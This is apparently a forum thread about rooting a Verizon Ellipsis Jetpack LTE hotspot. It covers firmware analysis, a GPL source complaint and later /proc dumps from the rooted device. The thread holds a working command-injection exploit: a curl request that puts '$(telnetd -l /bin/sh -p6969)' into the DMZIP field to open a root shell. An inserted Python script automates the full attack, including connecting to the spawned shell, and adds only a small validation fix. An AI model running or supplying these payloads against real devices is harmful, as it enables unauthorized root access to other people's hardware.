Ellipsis Jetpack MHS800L: Potential GPL Violation

I have a Verizon Ellipsis Jetpack MHS800L LTE hotspot (designed by Franklin Wireless). I downloaded the firmware update package from here, ran binwalk on it, and found that it's running OpenWrt Barrier Breaker. Also, /etc/passwd and /etc/shadow are fully visible, so cracking the root password shouldn't be difficult.

There's no source available from either Verizon or Franklin. Here are some pictures of the board. I gave it a try, but couldn't find a UART. Does anything on here look like a UART to you guys? Here's the FCC data. There are these weird metal pieces on the plastic bumpers that bridge some of those pads on the side of the board (visible in FCC pictures). Does anyone know what that would do?

Also, it's running a telnet server, but connecting to it says "connection closed by foreign host." How do you think I get a shell over telnet?


[image]

[image]


That answers that question.

Hi, I've recently got a couple of these devices. Any updates on your progress?

Since I made that post, the firmware update page has been taken down, and my laptop's SSD died, so I don't have the firmware image anymore. It may be on my desktop, but I'm not certain. Also, if I find it, I'm not sure I can legally repost it.

Some updates:
There's a secret page in the firmware that allows you to (among other things) enable an SSH server, and upload firmware updates. The updates are tarballs with some kind of hashing/signature scheme. I also emailed Franklin Wireless a few times asking for source code, and have been ignored every time.

If you can't tell, it's been a long time. I haven't worked on this since the winter, but I may give it another shot.

Internal photos here.

It contains a VZ22Q module (see page 23 of 24 of the FCC page; the module is also contained in the technicolor MBHA10VWQ).

Its CPU is Broadcom's BCM63139, which IS NOT supported under the bcm63xx target (as it is actually an ARM CPU).

The closest OpenWrt-related thing I can find to this series of ARM xDSL-focused CPUs is this forum thread about a BCM63138-based board to which someone has CFE bootloader access.

I found a download link for the firmware updater.

Binwalking the updater exe gives you the rootfs. There are some hidden pages in the webserver (/etc/www). If you navigate to http://<the_router_ip>/webpst/labpst/index.html you'll find some interesting dev options that may be of use.

Hello, I understand this thread is old but I want to share this to help more people: I got root on the MHS815L. I don't have an 800L but maybe someone can test it on there.

Basically: get the "jetpack" cookie when you log in,

curl 'http://router.ip/cgi-bin/settings_port_filtering.cgi' -X POST -H 'Cookie: jetpack=JETPACK_COOKIE_HERE' --data-raw '{"DMZEnable":true,"DMZIP":"192.168.69.12$(telnetd -l /bin/sh -p6969)","PFEnable":false,"ServiceEnable0":true,"ServiceName0":"Email(POP3,IMAP,SMTP)","ServiceEnable1":true,"ServiceName1":"FTP","ServiceEnable2":true,"ServiceName2":"HTTP","ServiceEnable3":true,"ServiceName3":"HTTPS","ServiceEnable4":true,"ServiceName4":"TELNET","Command":"Set","CustomCount":0}'

Replace router.ip with the router IP (duh)
and replace JETPACK_COOKIE_HERE with the "jetpack" cookie from your browser,
then:
telnet router.ip 6969

full root shell :3

tested on: MHS815L
Firmware version: 4.1.4.1-24235
System Version: 4.1.4.1-24235

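The procedure in the post above, scripted end to end, as an added example that is not code from the thread, from Franklin Wireless, or from the linked writeup. It takes the endpoint, field names and the $(telnetd ...) payload exactly as posted; the login step is not automated (you still paste the "jetpack" cookie), the Content-Type is left at urllib's form-encoded default to match what curl --data-raw sends, and the IPv4-literal check at the end is an assumption about what a fixed settings_port_filtering.cgi should do, since the actual CGI source is not available.

```python
"""Automate the DMZIP command injection from the post and show the check that
would have blocked it. Added example, not code from the thread or the vendor."""
import ipaddress
import json
import socket
import urllib.request

ENDPOINT = "/cgi-bin/settings_port_filtering.cgi"   # endpoint from the post
SHELL_PORT = 6969                                   # port used in the post


def build_payload(shell_port=SHELL_PORT):
    """Return the JSON body from the post: a normal-looking DMZ IP with a
    $(...) substitution appended. The hotspot evidently hands DMZIP to a
    shell unquoted, so the substitution runs as root."""
    inject = f"$(telnetd -l /bin/sh -p{shell_port})"
    body = {
        "DMZEnable": True,
        "DMZIP": "192.168.69.12" + inject,
        "PFEnable": False,
        "ServiceEnable0": True, "ServiceName0": "Email(POP3,IMAP,SMTP)",
        "ServiceEnable1": True, "ServiceName1": "FTP",
        "ServiceEnable2": True, "ServiceName2": "HTTP",
        "ServiceEnable3": True, "ServiceName3": "HTTPS",
        "ServiceEnable4": True, "ServiceName4": "TELNET",
        "Command": "Set",
        "CustomCount": 0,
    }
    return json.dumps(body, separators=(",", ":"))


def push_dmz_setting(router_ip, jetpack_cookie, shell_port=SHELL_PORT, timeout=10):
    """POST the injected DMZ setting the way the curl command does; returns HTTP status."""
    req = urllib.request.Request(
        f"http://{router_ip}{ENDPOINT}",
        data=build_payload(shell_port).encode(),
        method="POST",
        headers={"Cookie": f"jetpack={jetpack_cookie}"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def strip_telnet_iac(data):
    """Drop telnet option negotiation (IAC WILL/WONT/DO/DONT <opt>) that BusyBox
    telnetd sends before the shell prompt, so only the banner text remains."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == 0xFF and i + 2 < len(data) + 1 and i + 1 < len(data) and 0xFB <= data[i + 1] <= 0xFE:
            i += 3            # IAC, command, option
            continue
        out.append(data[i])
        i += 1
    return bytes(out)


def read_shell_banner(router_ip, shell_port=SHELL_PORT, timeout=5):
    """Connect to the spawned telnetd and return the first thing it prints."""
    with socket.create_connection((router_ip, shell_port), timeout=timeout) as s:
        return strip_telnet_iac(s.recv(4096)).decode(errors="replace")


def is_valid_dmz_ip(value):
    """Assumed fix for the CGI: accept only a bare IPv4 literal. Anything with
    shell metacharacters (including the payload above) fails to parse."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    import sys
    ip, cookie = sys.argv[1], sys.argv[2]           # e.g. 192.168.15.1 <jetpack cookie>
    print("POST status:", push_dmz_setting(ip, cookie))
    print(read_shell_banner(ip))                    # then: telnet <ip> 6969 for the shell
```

Run it as `python3 jetpack_dmz.py 192.168.15.1 <jetpack cookie>`; a 200 from the POST followed by the BusyBox banner means the shell is up on port 6969, after which the plain `telnet` session from the post works as shown. The injected string never survives `is_valid_dmz_ip`, which is the whole fix: parse the field as an address instead of pasting it into a command line.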

I will test this on the MHS800L and let you know if it works there too.

I'd also be interested in reading a writeup on how you figured that out if you ever feel like putting one together.


Hi! I kind of forgot about the reply I made. Did you ever manage to test it?

also, here's the writeup (although it's kind of short): https://vea.st/blog/verizon-router-writeup/

That was great! Thanks for sending.

I dug out my MHS800L, but it's in pieces. I can't find the antennas or case, and my laptop can't find its SSID when the router is on. We probably just need to attach some new antennas :)

Will update here when we have more to say.


It totally works :)

telnet 192.168.15.1 6969
Trying 192.168.15.1...
Connected to 192.168.15.1.
Escape character is '^]'.


BusyBox v1.19.4 (2014-11-23 13:31:05 CET) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/usr/sbin # ls
brctl              frankwebd          sequansd
chroot             iptables           sqn4gRadio
crond              iptables-restore   sqnimsd
debug-omadm        iptables-save      sqnomadmd
dnsmasq            iw                 telnetd
dropbear           lighttpd           xtables-multi
franklin-web.fcgi  radvd
/usr/sbin #

Turns out this thing is actually MIPS, not ARM.

/proc/cpuinfo:

system type		: SQN31x0 rev 0
machine			: Generic SQN31X0 board
processor		: 0
cpu model		: MIPS 24Kc V8.5
BogoMIPS		: 244.53
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 16
extra interrupt vector	: yes
hardware watchpoint	: yes, count: 4, address/irw mask: [0x0ff8, 0x0ff8, 0x0ff8, 0x0ff8]
ASEs implemented	: mips16
shadow register sets	: 1
kscratch registers	: 0
core			: 1
VCED exceptions		: not available
VCEI exceptions		: not available

/proc/meminfo:

MemTotal:          37620 kB
MemFree:            1224 kB
Buffers:            3892 kB
Cached:            14724 kB
SwapCached:            0 kB
Active:            12628 kB
Inactive:          12160 kB
Active(anon):       6508 kB
Inactive(anon):      212 kB
Active(file):       6120 kB
Inactive(file):    11948 kB
Unevictable:           0 kB
Mlocked:               0 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                 0 kB
Writeback:             0 kB
AnonPages:          6196 kB
Mapped:             7716 kB
Shmem:               548 kB
Slab:               8276 kB
SReclaimable:       1340 kB
SUnreclaim:         6936 kB
KernelStack:        1000 kB
PageTables:          504 kB
NFS_Unstable:          0 kB
Bounce:                0 kB
WritebackTmp:          0 kB
CommitLimit:       18808 kB
Committed_AS:     136112 kB
VmallocTotal:    1048372 kB
VmallocUsed:         608 kB
VmallocChunk:    1043724 kB

/proc/mtd:

dev:    size   erasesize  name
mtd0: 00080000 00010000 "spi0.0"
mtd1: 02000000 00040000 "spi0.2"
mtd2: 00060000 00010000 "Bootrom"
mtd3: 00040000 00040000 "Usim"
mtd4: 00040000 00040000 "Kvs"
mtd5: 00f00000 00040000 "kernel"
mtd6: 01000000 00040000 "region_fs"
mtd7: 00800000 00040000 "rootfs"
mtd8: 00200000 00040000 "rootfs_data"
mtd9: 00800000 00040000 "rootfs_next"